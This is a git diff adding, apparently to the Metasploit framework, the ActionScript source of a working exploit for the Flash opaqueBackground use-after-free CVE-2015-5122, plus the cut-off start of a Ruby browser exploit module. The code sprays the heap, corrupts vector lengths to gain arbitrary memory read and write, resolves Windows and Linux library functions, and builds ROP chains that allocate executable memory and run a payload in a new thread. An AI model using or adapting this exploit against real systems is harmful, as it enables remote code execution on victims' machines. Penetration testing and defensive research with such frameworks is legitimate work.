diff --git a/external/source/exploits/CVE-2015-5122/ExploitByteArray.as b/external/source/exploits/CVE-2015-5122/ExploitByteArray.as
new file mode 100755
index 0000000000..a8da46df7b
--- /dev/null
+++ b/external/source/exploits/CVE-2015-5122/ExploitByteArray.as
@@ -0,0 +1,85 @@
+package
+{
+    import flash.utils.ByteArray
+    
+    public class ExploitByteArray
+    {
+        private const MAX_STRING_LENGTH:uint = 100
+        public var ba:ByteArray
+        public var original_length:uint
+        private var platform:String
+
+        public function ExploitByteArray(p:String, l:uint = 1024)
+        {
+            ba = new ByteArray()
+            ba.length = l
+            ba.endian = "littleEndian"
+            ba.writeUnsignedInt(0)
+            platform = p
+            original_length = l
+        }
+
+        public function set_length(length:uint):void
+        {
+            ba.length = length
+        }
+
+        public function get_length():uint
+        {
+            return ba.length
+        }
+
+        public function lets_ready():void
+        {
+            ba.endian = "littleEndian"
+            if (platform == "linux") {
+                ba.length = 0xffffffff
+            } 
+        }
+
+        public function is_ready():Boolean
+        {
+            if (ba.length == 0xffffffff)
+                return true
+
+            return false
+        }
+
+        public function read(addr:uint, type:String = "dword"):uint
+        {
+            ba.position = addr
+            switch(type) {
+                case "dword": 
+                    return ba.readUnsignedInt()
+                case "word":
+                    return ba.readUnsignedShort()
+                case "byte":
+                    return ba.readUnsignedByte()
+            }
+            return 0
+        }
+
+        public function read_string(addr:uint, length:uint = 0):String
+        {
+            ba.position = addr
+            if (length == 0)
+                return ba.readUTFBytes(MAX_STRING_LENGTH)
+            else
+                return ba.readUTFBytes(length) 
+        }
+
+        public function write(addr:uint, value:* = 0, zero:Boolean = true):void
+        {
+            var i:uint
+
+            if (addr) ba.position = addr
+            if (value is String) {
+                for (i = 0; i < value.length; i++) ba.writeByte(value.charCodeAt(i))
+                if (zero) ba.writeByte(0)
+            } else if (value is ByteArray) {
+                var value_length:uint = value.length
+                for (i = 0; i < value_length; i++) ba.writeByte(value.readByte())
+            } else ba.writeUnsignedInt(value)
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2015-5122/ExploitVector.as b/external/source/exploits/CVE-2015-5122/ExploitVector.as
new file mode 100755
index 0000000000..18aa4778a0
--- /dev/null
+++ b/external/source/exploits/CVE-2015-5122/ExploitVector.as
@@ -0,0 +1,75 @@
+package
+{
+    public class ExploitVector
+    {
+        private var uv:Vector.<uint>
+        public var original_length:uint 
+        
+        public function ExploitVector(v:Vector.<uint>, length:uint)
+        {
+            uv = v
+            original_length = length
+        }
+
+        public function restore():void
+        {
+            uv[0x3ffffffe] = original_length
+        }
+
+        public function is_ready():Boolean
+        {
+            if (uv.length > original_length) 
+            {
+                return true
+            }
+            return false
+        } 
+        
+        public function at(pos:uint):uint
+        {
+            return uv[pos]
+        }
+
+        // pos: position where a Vector.<Object>[0] lives
+        public function set_own_address(pos:uint):void
+        {
+            uv[0] = uv[pos - 5] - ((pos - 5) * 4) - 0xc
+        }
+
+        public function read(addr:uint):uint
+        {
+            var pos:uint = 0
+
+            if (addr > uv[0]) {
+                pos = ((addr - uv[0]) / 4) - 2
+            } else {
+                pos = ((0xffffffff - (uv[0] - addr)) / 4) - 1
+            }
+
+            return uv[pos]
+        }
+
+        public function write(addr:uint, value:uint = 0):void
+        {           
+            var pos:uint = 0
+
+            if (addr > uv[0]) {
+                pos = ((addr - uv[0]) / 4) - 2
+            } else {
+                pos = ((0xffffffff - (uv[0] - addr)) / 4) - 1
+            }
+
+            uv[pos] = value
+        }
+
+        public function search_pattern(pattern:uint, limit:uint):uint
+        {
+            for (var i:uint = 0; i < limit/4; i++) {
+                if (uv[i] == pattern) {
+                    return i
+                }
+            }
+            throw new Error() 
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2015-5122/Exploiter.as b/external/source/exploits/CVE-2015-5122/Exploiter.as
new file mode 100755
index 0000000000..a5e97e3f9e
--- /dev/null
+++ b/external/source/exploits/CVE-2015-5122/Exploiter.as
@@ -0,0 +1,493 @@
+package
+{ 
+    import flash.utils.ByteArray
+    import flash.system.System
+
+    public class Exploiter
+    {
+        private const VECTOR_OBJECTS_LENGTH:uint = 1014
+        private var exploit:Exploit
+        private var ev:ExploitVector
+        private var eba:ExploitByteArray
+        private var payload:ByteArray
+        private var platform:String
+        private var op_system:String
+        private var pos:uint
+        private var byte_array_object:uint
+        private var main:uint
+        private var stack_object:uint
+        private var payload_space_object:uint
+        private var buffer_object:uint
+        private var buffer:uint
+        private var vtable:uint
+        private var stack_address:uint
+        private var payload_address:uint 
+        private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
+        private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400) 
+        private var spray:Vector.<Object> = new Vector.<Object>(90000)
+
+        public function Exploiter(exp:Exploit, pl:String, os:String, p:ByteArray, uv:Vector.<uint>, uv_length:uint):void
+        {
+            exploit = exp
+            payload = p
+            platform = pl
+            op_system = os
+
+            ev = new ExploitVector(uv, uv_length)
+            if (!ev.is_ready()) return
+            eba = new ExploitByteArray(platform)
+            spray_objects()
+            try { pos = search_objects() } catch (err:Error) { ev.restore(); cleanup(); return; }
+            ev.set_own_address(pos)
+            if (!disclose_objects()) { ev.restore(); cleanup(); return; }
+            disclose_addresses()
+            corrupt_byte_array()
+            if (!eba.is_ready()) { ev.restore(); cleanup(); return }
+            do_rop()
+            restore_byte_array()
+            ev.restore()
+            cleanup()
+        }
+
+        private function spray_objects():void
+        {
+            Logger.log("[*] Exploiter - spray_objects()")
+            for (var i:uint = 0; i < spray.length; i++) 
+            {
+                spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)
+                spray[i][0] = eba.ba
+                spray[i][1] = exploit 
+                spray[i][2] = stack
+                spray[i][3] = payload_space
+            } 
+        }
+        
+        private function search_objects():uint
+        {
+            Logger.log("[*] Exploiter - search_objects()")
+            var idx:uint = ev.search_pattern(VECTOR_OBJECTS_LENGTH, 0xac100)
+            return idx + 1
+        }
+
+        private function disclose_objects():Boolean
+        { 
+            Logger.log("[*] Exploiter - disclose_objects()")
+            byte_array_object = ev.at(pos) - 1
+            main = ev.at(pos + 1) - 1
+            stack_object = ev.at(pos + 2) - 1
+            payload_space_object = ev.at(pos + 3) - 1
+            if (byte_array_object < 0x1000 || main < 0x1000 || stack_object < 0x1000 || payload_space_object < 0x1000) {
+                return false
+            }
+            return true
+        }
+
+        private function disclose_addresses():void
+        {
+            Logger.log("[*] Exploiter - disclose_addresses()")
+            if (platform == "linux") 
+            {
+                buffer_object = ev.read(byte_array_object + 0x10)
+                buffer = ev.read(buffer_object + 0x1c)
+            }    
+            else if (platform == "win") 
+            {
+                buffer_object = ev.read(byte_array_object + 0x40)
+                buffer = ev.read(buffer_object + 8)
+            }
+            vtable = ev.read(main)
+            stack_address = ev.read(stack_object + 0x18)
+            payload_address = ev.read(payload_space_object + 0x18)
+        }
+        
+        private function corrupt_byte_array():void
+        {
+            Logger.log("[*] Exploiter - corrupt_byte_array(): " + platform)
+            if (platform == "linux")
+            {
+                ev.write(buffer_object + 0x1c) // *array
+                ev.write(buffer_object + 0x20, 0xffffffff) // capacity
+            } 
+            else if (platform == "win")
+            {
+                ev.write(buffer_object + 8) // *array
+                ev.write(buffer_object + 16, 0xffffffff) // capacity
+            }
+            eba.lets_ready()
+        }
+
+        private function restore_byte_array():void
+        { 
+            Logger.log("[*] Exploiter - restore_byte_array(): " + platform)
+            if (platform == "linux")
+            {
+                ev.write(buffer_object + 0x1c, buffer) // *array
+                ev.write(buffer_object + 0x20, 1024) // capacity
+            } 
+            else if (platform == "win")
+            {
+                ev.write(buffer_object + 8, buffer) // *array
+                ev.write(buffer_object + 16, 1024) // capacity
+            }
+            eba.set_length(eba.original_length) 
+        }
+        
+        private function do_rop():void
+        {
+            Logger.log("[*] Exploiter - do_rop()")
+            if (platform == "linux") {
+                do_rop_linux()
+            } else if (platform == "win") {
+                if (op_system == "Windows 8.1") {
+                    do_rop_windows8()
+                } else if (op_system == "Windows 7") {
+                    do_rop_windows()
+                } else {
+                    return
+                }
+            } else {
+                return
+            }
+        }
+
+        private function do_rop_windows():void
+        {
+            Logger.log("[*] Exploiter - do_rop_windows()")
+            var pe:PE = new PE(eba)
+            var flash:uint = pe.base(vtable)
+            var winmm:uint = pe.module("winmm.dll", flash)
+            var kernel32:uint = pe.module("kernel32.dll", winmm)            
+            var ntdll:uint = pe.module("ntdll.dll", kernel32)
+            var virtualprotect:uint = pe.procedure("VirtualProtect", kernel32)
+            var virtualalloc:uint = pe.procedure("VirtualAlloc", kernel32)
+            var createthread:uint = pe.procedure("CreateThread", kernel32)
+            var memcpy:uint = pe.procedure("memcpy", ntdll)
+            var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
+            var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
+            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, flash)
+			
+			Logger.log("add esp c ret: " + addespcret.toString(16))
+            
+            // Continuation of execution
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            //eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
+			
+			eba.write(0, "\x31\xC0", false) // xor eax, eax
+			eba.write(0, "\x87\xf4\xC2\x04\x00", false) // xchg esp, esi # ret 4
+			
+            // Put the payload (command) in memory
+            eba.write(payload_address + 8, payload, true); // payload
+
+            // Put the fake vtabe / stack on memory
+			//for (var i:uint = 0 ; i < 0x100; i = i + 4) {
+				//eba.write(stack_address + 0x18000 + i, 0x41410000 + i)
+			//}
+			
+            eba.write(stack_address + 0x18020, xchgeaxespret) // Initial gadget (stackpivot)
+			eba.write(stack_address + 0x18000, xchgeaxesiret) // save original esp in esi
+			
+			eba.write(0, addespcret)
+			eba.write(stack_address + 0x18014, addespcret)
+			eba.write(stack_address + 0x18024, virtualprotect)
+			//eba.write(0, virtualprotect)
+
+            // VirtualProtect
+            eba.write(0, virtualalloc)
+            eba.write(0, buffer + 0x10)
+            eba.write(0, 0x1000)
+            eba.write(0, 0x40)
+            eba.write(0, buffer + 0x8) // Writable address (4 bytes)
+
+            // VirtualAlloc
+            eba.write(0, memcpy)
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, 0x4000)
+            eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
+            eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
+
+            // memcpy
+            eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, payload_address + 8)
+            eba.write(0, payload.length) 
+
+            // CreateThread
+            eba.write(0, createthread)
+            eba.write(0, buffer + 0x10) // return to fix things
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0)
+			
+            eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
+			
+			Logger.alert("here we go " + main.toString(16) + " " + (stack_address + 0x18000).toString(16))
+			exploit.hasOwnProperty('msf')
+        }
+		
+		private function do_rop_windows8():void
+        {
+            Logger.log("[*] Exploiter - do_rop_windows()")
+            var pe:PE = new PE(eba)
+            var flash:uint = pe.base(vtable)
+            var winmm:uint = pe.module("winmm.dll", flash)
+            var kernel32:uint = pe.module("kernel32.dll", winmm)            
+            var ntdll:uint = pe.module("ntdll.dll", kernel32)
+            var virtualprotect:uint = pe.procedure("VirtualProtect", kernel32)
+            var virtualalloc:uint = pe.procedure("VirtualAlloc", kernel32)
+            var createthread:uint = pe.procedure("CreateThread", kernel32)
+            var memcpy:uint = pe.procedure("memcpy", ntdll)
+            var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
+            var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
+            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, flash)
+			
+			Logger.log("add esp c ret: " + addespcret.toString(16))
+            
+            // Continuation of execution
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            //eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
+			
+			eba.write(0, "\x31\xC0", false) // xor eax, eax
+			eba.write(0, "\x87\xf4\xC2\x04\x00", false) // xchg esp, esi # ret 4
+			
+            // Put the payload (command) in memory
+            eba.write(payload_address + 8, payload, true); // payload
+
+            // Put the fake vtabe / stack on memory
+			//for (var i:uint = 0 ; i < 0x100; i = i + 4) {
+				//eba.write(stack_address + 0x18000 + i, 0x41410000 + i)
+			//}
+			
+            eba.write(stack_address + 0x18020, xchgeaxespret) // Initial gadget (stackpivot)
+			eba.write(stack_address + 0x18000, xchgeaxesiret) // save original esp in esi
+			
+			eba.write(0, addespcret)
+			eba.write(stack_address + 0x18014, addespcret)
+			eba.write(stack_address + 0x18024, virtualprotect)
+			//eba.write(0, virtualprotect)
+
+            // VirtualProtect
+            eba.write(0, virtualalloc)
+            eba.write(0, buffer + 0x10)
+            eba.write(0, 0x1000)
+            eba.write(0, 0x40)
+            eba.write(0, buffer + 0x8) // Writable address (4 bytes)
+
+            // VirtualAlloc
+            eba.write(0, memcpy)
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, 0x4000)
+            eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
+            eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
+
+            // memcpy
+            eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, payload_address + 8)
+            eba.write(0, payload.length) 
+
+            // CreateThread
+            eba.write(0, createthread)
+            eba.write(0, buffer + 0x10) // return to fix things
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0)
+			
+            eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
+			
+			Logger.alert("here we go " + main.toString(16) + " " + (stack_address + 0x18000).toString(16))
+			exploit.hasOwnProperty('msf')
+        }
+
+        /*private function do_rop_windows8():void
+        {
+            Logger.log("[*] Exploiter - do_rop_windows8()")
+            var pe:PE = new PE(eba)
+            var flash:uint = pe.base(vtable)
+            var winmm:uint = pe.module("winmm.dll", flash)
+            var advapi32:uint = pe.module("advapi32.dll", flash)
+            var kernelbase:uint = pe.module("kernelbase.dll", advapi32)
+            var kernel32:uint = pe.module("kernel32.dll", winmm) 
+            var ntdll:uint = pe.module("ntdll.dll", kernel32)
+            var virtualprotect:uint = pe.procedure("VirtualProtect", kernelbase)
+            var virtualalloc:uint = pe.procedure("VirtualAlloc", kernelbase)
+            var createthread:uint = pe.procedure("CreateThread", kernelbase)
+            var memcpy:uint = pe.procedure("memcpy", ntdll)
+            var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
+            var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
+            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
+            
+            // Continuation of execution
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
+
+            // Put the payload (command) in memory
+            eba.write(payload_address + 8, payload, true); // payload
+
+            // Put the fake vtabe / stack on memory
+            eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
+            eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
+            eba.write(0, virtualprotect)
+
+            // VirtualProtect
+            eba.write(0, virtualalloc)
+            eba.write(0, buffer + 0x10)
+            eba.write(0, 0x1000)
+            eba.write(0, 0x40)
+            eba.write(0, buffer + 0x8) // Writable address (4 bytes)
+
+            // VirtualAlloc
+            eba.write(0, memcpy)
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, 0x4000)
+            eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
+            eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
+
+            // memcpy
+            eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, payload_address + 8)
+            eba.write(0, payload.length) 
+
+            // CreateThread
+            eba.write(0, createthread)
+            eba.write(0, buffer + 0x10) // return to fix things
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0)
+
+            eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
+			Logger.alert("here we go " + main.toString(16) + " " + (stack_address + 0x18000).toString(16))
+            exploit.toString() // call method in the fake vtable
+        }*/
+
+        private function do_rop_linux():void
+        {
+            Logger.log("[*] Exploiter - do_rop_linux()")
+            var flash:Elf = new Elf(eba, vtable)
+            var feof:uint = flash.external_symbol('feof')
+            var libc:Elf = new Elf(eba, feof)
+            var popen:uint = libc.symbol("popen")
+            var mprotect:uint = libc.symbol("mprotect")
+            var mmap:uint = libc.symbol("mmap")
+            var clone:uint = libc.symbol("clone")
+            var xchgeaxespret:uint = flash.gadget("c394", 0x0000ffff)
+            var xchgeaxesiret:uint = flash.gadget("c396", 0x0000ffff)
+            var addesp2cret:uint = flash.gadget("c32cc483", 0xffffffff)
+
+            // Continuation of execution
+            // 1) Recover original vtable
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            // 2) Recover original stack
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi
+
+            // my_memcpy
+            eba.write(buffer + 0x60, "\x56", false) // push esi
+            eba.write(0, "\x57", false)             // push edi
+            eba.write(0, "\x51", false)             // push ecx
+            eba.write(0, "\x8B\x7C\x24\x10", false) // mov edi,[esp+0x10]
+            eba.write(0, "\x8B\x74\x24\x14", false) // mov esi,[esp+0x14]
+            eba.write(0, "\x8B\x4C\x24\x18", false) // mov ecx,[esp+0x18]
+            eba.write(0, "\xF3\xA4", false)         // rep movsb 
+            eba.write(0, "\x59", false)             // pop ecx
+            eba.write(0, "\x5f", false)             // pop edi
+            eba.write(0, "\x5e", false)             // pop esi
+            eba.write(0, "\xc3", false)             // ret
+
+            // Put the popen parameters in memory
+            eba.write(payload_address + 0x8, payload, true) // false
+           
+            // Put the fake stack/vtable on memory 
+            eba.write(stack_address + 0x18024, xchgeaxespret) // Initial gadget, stackpivot
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // Save original stack on esi
+            eba.write(0, addesp2cret) //second pivot to preserver stack_address + 0x18024
+
+            // Return to mprotect()
+            eba.write(stack_address + 0x18034, mprotect)
+            // Return to stackpivot (jmp over mprotect parameters)
+            eba.write(0, addesp2cret)
+            // mprotect() arguments
+            eba.write(0, buffer) // addr
+            eba.write(0, 0x1000) // size
+            eba.write(0, 0x7)    // PROT_READ | PROT_WRITE | PROT_EXEC
+
+            // Return to mmap()
+            eba.write(stack_address + 0x18068, mmap)
+            // Return to stackpivot (jmp over mmap parameters)
+            eba.write(0, addesp2cret)
+            // mmap() code segment arguments
+            eba.write(0, 0x70000000) // 0x70000000
+            eba.write(0, 0x4000) // size
+            eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC
+            eba.write(0, 0x22) // MAP_PRIVATE | MAP_ANONYMOUS
+            eba.write(0, 0xffffffff) // filedes
+            eba.write(0, 0) // offset
+
+            // Return to mmap()
+            eba.write(stack_address + 0x1809c, mmap)
+            // Return to stackpivot (jmp over mmap parameters)
+            eba.write(0, addesp2cret)
+            // mmap() stack segment arguments
+            eba.write(0, 0x70008000) // NULL
+            eba.write(0, 0x10000) // size
+            eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC
+            eba.write(0, 0x22) // MAP_PRIVATE | MAP_ANONYMOUS
+            eba.write(0, -1) // filedes
+            eba.write(0, 0) // offset
+
+            // Return to memcpy()
+            eba.write(stack_address + 0x180d0, buffer + 0x60)
+            // Return to stackpivot (jmp over memcpy parameters)
+            eba.write(0, addesp2cret)
+            // memcpy() parameters
+            eba.write(0, 0x70000000)
+            eba.write(0, payload_address + 0x8)
+            eba.write(0, payload.length)
+
+            // Return to clone()
+            eba.write(stack_address + 0x18104, clone)
+            // Return to CoE (fix stack and object vtable)
+            eba.write(0, buffer + 0x10)
+            // clone() arguments
+            eba.write(0, 0x70000000) // code
+            eba.write(0, 0x7000bff0) // stack
+            eba.write(0, 0x00000100) // flags CLONE_VM
+            eba.write(0, 0)          // args
+           
+            //call   DWORD PTR [eax+0x24]
+            //EAX: 0x41414141 ('AAAA')
+            //EDI: 0xad857088 ("AAAA\377")
+            eba.write(main, stack_address + 0x18000)
+            exploit.hasOwnProperty('msf')
+        }
+
+        private function cleanup():void
+        { 
+            Logger.log("[*] Exploiter - cleanup()")
+            spray = null
+            stack = null
+            payload_space = null
+            eba = null
+            ev = null
+            exploit = null
+            System.pauseForGCIfCollectionImminent(0)
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2015-5122/Logger.as b/external/source/exploits/CVE-2015-5122/Logger.as
new file mode 100755
index 0000000000..61ec768c25
--- /dev/null
+++ b/external/source/exploits/CVE-2015-5122/Logger.as
@@ -0,0 +1,32 @@
+package 
+{
+    import flash.external.ExternalInterface
+
+    public class Logger {
+        private static const DEBUG:uint = 1
+ 
+        public static function alert(msg:String):void
+        {
+            var str:String = "";
+
+            if (DEBUG == 1)
+                str += msg;
+            
+            if(ExternalInterface.available){
+                ExternalInterface.call("alert", str);
+            }
+        }
+
+        public static function log(msg:String):void
+        {
+            var str:String = "";
+
+            if (DEBUG == 1)
+                str += msg;
+            
+            if(ExternalInterface.available){
+                ExternalInterface.call("console.log", str);
+            }
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2015-5122/MyClass.as b/external/source/exploits/CVE-2015-5122/MyClass.as
new file mode 100755
index 0000000000..eabb4998c5
--- /dev/null
+++ b/external/source/exploits/CVE-2015-5122/MyClass.as
@@ -0,0 +1,142 @@
+package
+{
+    import flash.display.DisplayObjectContainer;
+    import flash.utils.ByteArray;
+    import flash.system.Capabilities;
+    import flash.events.MouseEvent;
+    import flash.external.ExternalInterface;
+    import flash.text.*;
+    import flash.text.*;
+    import flash.text.engine.*;
+
+    public class MyClass
+    {
+        static var 
+            _gc:Array,
+            _ar:Array,
+            _arLen1:int,
+            _arLen2:int,
+            _arLen:int,
+            _vu:Vector.<uint>,
+            _vo:Vector.<Object>,
+            _tb:TextBlock,
+            _tl:TextLine,
+            _mc:MyClass,
+            _is64 = null,
+            _chrome:Boolean,
+            _done:Boolean,
+            _cnt:int,
+            _vLen:int,
+            _magic:uint = 0x123456,
+            LEN40:uint = 0x40000000;
+		
+        static function valueOf2()
+        {
+            try 
+            {	
+                if (++_cnt < _arLen2) {
+                    // recursive call for next TextLine
+                    _ar[_cnt].opaqueBackground = _mc;
+                } else {
+                    Logger.log("MyClass.valueOf2()");
+
+                    // free internal objects
+                    for(var i:int=1; i <= 5; i++)
+                        _tb.recreateTextLine(_ar[_arLen2-i]);
+
+                    // reuse freed memory
+                    for(i=_arLen2; i < _arLen; i++)
+                        _ar[i].length = _vLen;
+                }
+            }
+            catch (e:Error)
+            {
+                Logger.log("valueOf2 " + e.toString());
+            }
+            return _vLen+8;
+        }
+		
+		static function TryExpl(e:Exploit, platform:String, os:String, payload:ByteArray)
+		{
+			try
+			{
+                // init vars
+                Logger.log("init vars")
+                _arLen1 = 10 * 3; // 10 vectors per page
+                _arLen2 = _arLen1 + 4 * 4; // 4 TextLine per page
+                _arLen  = _arLen2 + 10 * 8;
+                _ar = new Array(_arLen);
+                if (!_gc) _gc = new Array();
+                _gc.push(_ar);
+                if (!_tb) {
+                    _tb = new TextBlock(new TextElement("TextElement", new ElementFormat()));
+                    if (!_tb) throw new Error("_tb = " + _tb);
+                }
+                _mc = new MyClass();
+                _vLen = 400/4-2;
+				
+                // fill 400-byte holes (400 is factor of 0x320(800) opaqueBackground corruption offset)
+                Logger.log("fill 400-byte holes (400 is factor of 0x320(800) opaqueBackground corruption offset)")
+                for(var i:int; i < _arLen1; i++) 
+                    _ar[i] = new Vector.<uint>(_vLen);
+				
+                // prepare Vector objects
+                Logger.log("prepare Vector objects")
+                for(i=_arLen2; i < _arLen; i++){
+                    _ar[i] = new Vector.<uint>(8);
+                    _ar[i][0] = i;
+                }
+				
+                // prepare TextLines
+                Logger.log("prepare TextLines")
+                for(i=_arLen1; i < _arLen2; i++) 
+                    _ar[i] = _tb.createTextLine();
+                // fill 1016-byte holes (0x38c is a size of internal TextLine object)
+                Logger.log("fill 1016-byte holes (0x38c is a size of internal TextLine object)")
+                for(i=_arLen1; i < _arLen2; i++) 
+                    _ar[i].opaqueBackground = 1; // alloc 1016 bytes
+
+                // set custom valueOf() for _mc
+                Logger.log("set custom valueOf() for _mc")
+                MyClass.prototype.valueOf = valueOf2;
+
+                // here we go, call the vulnerable setter
+                Logger.log("here we go, call the vulnerable setter")
+                _cnt = _arLen2-6;
+                _ar[_cnt].opaqueBackground = _mc;
+
+                // find corrupted vector length 
+                Logger.log("find corrupted vector length ")
+                for(i=_arLen2; i < _arLen; i++) {
+                    _vu = _ar[i];
+                    if (_vu.length > _vLen+2) {
+                    	Logger.log("ar["+i.toString()+"].length = " + _vu.length.toString(16));
+                    	Logger.log("ar["+i.toString()+"]["+_vLen.toString(16)+"] = " + _vu[_vLen].toString(16));
+                    	if (_vu[_vLen] == _vLen) {
+                    		// corrupt next vector 
+                    		_vu[_vLen] = LEN40;
+                    		// get corrupted vector
+                    		_vu = _ar[_vu[_vLen+2]]; 
+                    		break;
+                    	}
+                    };// else CheckCorrupted(_vu, i); // 4RnD
+                }
+
+                // check results
+                Logger.log("v.length = " + _vu.length.toString(16));
+                if (_vu.length < LEN40) throw new Error("try again");
+
+                var exploiter:Exploiter = new Exploiter(e, platform, os, payload, _vu, 0x62)
+
+                // clean up
+                Logger.log("_vu.length = " + _vu.length.toString(16));
+			}
+			catch (e:Error)
+			{
+                Logger.log("TryExpl " + e.toString());
+			}
+		}
+		
+	}
+
+}
\ No newline at end of file
diff --git a/external/source/exploits/CVE-2015-5122/PE.as b/external/source/exploits/CVE-2015-5122/PE.as
new file mode 100755
index 0000000000..8753586477
--- /dev/null
+++ b/external/source/exploits/CVE-2015-5122/PE.as
@@ -0,0 +1,72 @@
+package
+{
+    public class PE
+    {
+        private var eba:ExploitByteArray
+
+        public function PE(ba:ExploitByteArray)
+        {
+            eba = ba
+        }
+
+        public function base(addr:uint):uint
+        {
+            addr &= 0xffff0000
+            while (true) {
+                if (eba.read(addr) == 0x00905a4d) return addr
+                addr -= 0x10000
+            }
+            return 0
+        }
+
+        public function module(name:String, addr:uint):uint
+        {
+            var iat:uint = addr + eba.read(addr + eba.read(addr + 0x3c) + 0x80), i:int = -1
+            var mod_name:String
+
+            while (true) {
+                var entry:uint = eba.read(iat + (++i) * 0x14 + 12)
+                if (!entry) throw new Error("FAIL!"); 
+                mod_name = eba.read_string(addr + entry, name.length)
+                if (mod_name.toUpperCase() == name.toUpperCase()) break
+            }
+            return base(eba.read(addr + eba.read(iat + i * 0x14 + 16)))
+        }
+
+        public function procedure(name:String, addr:uint):uint
+        {
+            var eat:uint = addr + eba.read(addr + eba.read(addr + 0x3c) + 0x78)
+            var numberOfNames:uint = eba.read(eat + 0x18)
+            var addressOfFunctions:uint = addr + eba.read(eat + 0x1c)
+            var addressOfNames:uint = addr + eba.read(eat + 0x20)
+            var addressOfNameOrdinals:uint = addr + eba.read(eat + 0x24)
+            var proc_name:String
+
+            for (var i:uint = 0; ; i++) {
+                var entry:uint = eba.read(addressOfNames + i * 4)
+                proc_name = eba.read_string(addr + entry, name.length + 2)
+                if (proc_name.toUpperCase() == name.toUpperCase()) break
+            }
+            return addr + eba.read(addressOfFunctions + eba.read(addressOfNameOrdinals + i * 2, "word") * 4)
+        }
+
+        public function gadget(gadget:String, hint:uint, addr:uint):uint
+        {
+            var find:uint = 0
+            var contents:uint = 0
+            var limit:uint = eba.read(addr + eba.read(addr + 0x3c) + 0x50)
+            var value:uint = parseInt(gadget, 16)
+
+            for (var i:uint = 0; i < limit - 4; i++) {
+                contents = eba.read(addr + i)
+                if (hint == 0xffffffff && value == contents) {
+                    return addr + i
+                }
+                if (hint != 0xffffffff && value == (contents & hint)) {
+                    return addr + i
+                }
+            }
+            throw new Error()
+        }
+    }
+}
diff --git a/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb b/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb
new file mode 100644
index 0000000000..cfdb5d99ff
--- /dev/null
+++ b/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb
@@ -0,0 +1,137 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::BrowserExploitServer
+
+  def initialize(info={})
+    super(update_info(info,
